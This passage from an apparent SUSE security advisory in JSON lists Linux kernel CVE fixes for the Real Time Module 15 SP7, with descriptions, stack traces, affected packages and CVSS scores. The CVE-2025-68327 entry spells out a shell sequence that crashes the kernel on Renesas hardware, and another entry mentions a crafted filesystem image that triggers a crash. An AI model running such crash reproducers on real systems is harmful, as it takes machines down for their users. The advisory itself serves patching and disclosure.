"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68301",
"url": "https://www.suse.com/security/cve/CVE-2025-68301"
},
{
"category": "external",
"summary": "SUSE Bug 1255120 for CVE-2025-68301",
"url": "https://bugzilla.suse.com/1255120"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68301"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68327",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68327"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: renesas_usbhs: Fix synchronous external abort on unbind\n\nA synchronous external abort occurs on the Renesas RZ/G3S SoC if unbind is\nexecuted after the configuration sequence described above:\n\nmodprobe usb_f_ecm\nmodprobe libcomposite\nmodprobe configfs\ncd /sys/kernel/config/usb_gadget\nmkdir -p g1\ncd g1\necho \"0x1d6b\" \u003e idVendor\necho \"0x0104\" \u003e idProduct\nmkdir -p strings/0x409\necho \"0123456789\" \u003e strings/0x409/serialnumber\necho \"Renesas.\" \u003e strings/0x409/manufacturer\necho \"Ethernet Gadget\" \u003e strings/0x409/product\nmkdir -p functions/ecm.usb0\nmkdir -p configs/c.1\nmkdir -p configs/c.1/strings/0x409\necho \"ECM\" \u003e configs/c.1/strings/0x409/configuration\n\nif [ ! -L configs/c.1/ecm.usb0 ]; then\n ln -s functions/ecm.usb0 configs/c.1\nfi\n\necho 11e20000.usb \u003e UDC\necho 11e20000.usb \u003e /sys/bus/platform/drivers/renesas_usbhs/unbind\n\nThe displayed trace is as follows:\n\n Internal error: synchronous external abort: 0000000096000010 [#1] SMP\n CPU: 0 UID: 0 PID: 188 Comm: sh Tainted: G M 6.17.0-rc7-next-20250922-00010-g41050493b2bd #55 PREEMPT\n Tainted: [M]=MACHINE_CHECK\n Hardware name: Renesas SMARC EVK version 2 based on r9a08g045s33 (DT)\n pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs]\n lr : usbhsg_update_pullup+0x3c/0x68 [renesas_usbhs]\n sp : ffff8000838b3920\n x29: ffff8000838b3920 x28: ffff00000d585780 x27: 0000000000000000\n x26: 0000000000000000 x25: 0000000000000000 x24: ffff00000c3e3810\n x23: ffff00000d5e5c80 x22: ffff00000d5e5d40 x21: 0000000000000000\n x20: 0000000000000000 x19: ffff00000d5e5c80 x18: 0000000000000020\n x17: 2e30303230316531 x16: 312d7968703a7968 x15: 3d454d414e5f4344\n x14: 000000000000002c x13: 0000000000000000 x12: 0000000000000000\n x11: ffff00000f358f38 x10: ffff00000f358db0 x9 : ffff00000b41f418\n x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : fefefeff6364626d\n x5 : 8080808000000000 x4 : 000000004b5ccb9d x3 : 0000000000000000\n x2 : 0000000000000000 x1 : ffff800083790000 x0 : ffff00000d5e5c80\n Call trace:\n usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] (P)\n usbhsg_pullup+0x4c/0x7c [renesas_usbhs]\n usb_gadget_disconnect_locked+0x48/0xd4\n gadget_unbind_driver+0x44/0x114\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_release_driver+0x18/0x24\n bus_remove_device+0xcc/0x10c\n device_del+0x14c/0x404\n usb_del_gadget+0x88/0xc0\n usb_del_gadget_udc+0x18/0x30\n usbhs_mod_gadget_remove+0x24/0x44 [renesas_usbhs]\n usbhs_mod_remove+0x20/0x30 [renesas_usbhs]\n usbhs_remove+0x98/0xdc [renesas_usbhs]\n platform_remove+0x20/0x30\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_driver_detach+0x18/0x24\n unbind_store+0xb4/0xb8\n drv_attr_store+0x24/0x38\n sysfs_kf_write+0x7c/0x94\n kernfs_fop_write_iter+0x128/0x1b8\n vfs_write+0x2ac/0x350\n ksys_write+0x68/0xfc\n __arm64_sys_write+0x1c/0x28\n invoke_syscall+0x48/0x110\n el0_svc_common.constprop.0+0xc0/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xf0\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n Code: 7100003f 1a9f07e1 531c6c22 f9400001 (79400021)\n ---[ end trace 0000000000000000 ]---\n note: sh[188] exited with irqs disabled\n note: sh[188] exited with preempt_count 1\n\nThe issue occurs because usbhs_sys_function_pullup(), which accesses the IP\nregisters, is executed after the USBHS clocks have been disabled. The\nproblem is reproducible on the Renesas RZ/G3S SoC starting with the\naddition of module stop in the clock enable/disable APIs. With module stop\nfunctionality enabled, a bus error is expected if a master accesses a\nmodule whose clock has been stopped and module stop activated.\n\nDisable the IP clocks at the end of remove.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68327",
"url": "https://www.suse.com/security/cve/CVE-2025-68327"
},
{
"category": "external",
"summary": "SUSE Bug 1255488 for CVE-2025-68327",
"url": "https://bugzilla.suse.com/1255488"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68327"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
